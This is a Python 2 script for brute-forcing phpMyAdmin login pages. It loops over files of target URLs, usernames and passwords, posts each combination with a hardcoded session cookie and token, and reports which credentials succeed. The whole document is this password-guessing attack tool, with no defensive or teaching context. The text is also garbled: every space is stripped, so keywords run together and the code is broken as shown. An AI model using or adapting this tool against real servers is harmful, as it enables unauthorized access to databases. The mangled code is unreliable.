#!usr/bin/envpython
#encoding:utf-8
importrequests
headers={'Content-Type':'application/x-www-form-urlencoded',
'User-Agent':'Mozilla/5.0(X11;Linuxx86_64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/63.0.3239.132Safari/537.36',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Cookie':'pmaCookieVer=5;pma_lang=zh_CN;pma_collation_connection=utf8mb4_unicode_ci;phpMyAdmin=vo6nt8q71hsv93fb9a7c5b5oot2215gq'
}
defattack(host,username,password):
host=host+"/index.php"
payload={'pma_username':username,
'pma_password':password,
'server':'1',
'target':'index.php',
'token':'bf8e4192569617d39070c5739cd1776f'}
try:
html=requests.post(host,headers=headers,data=payload).text
if"themes/pmahomme/img/logo_right.png"inhtml:
print"[-]%s-%s"%(username,password)
else:
print"[+]%s-%s-%s"%(host,username,password)
exceptExceptionase:
pass
withopen('./url.txt','r')asurl:
host_t=url.readlines()
withopen('./username.txt','r')asusername:
username_t=username.readlines()
withopen('./password.txt','r')aspassword:
password_t=password.readlines()
forhinhost_t:
host=h.strip()
foruinusername_t:
username=u.strip()
forpinpassword_t:
password=p.strip()
attack(host,username,password)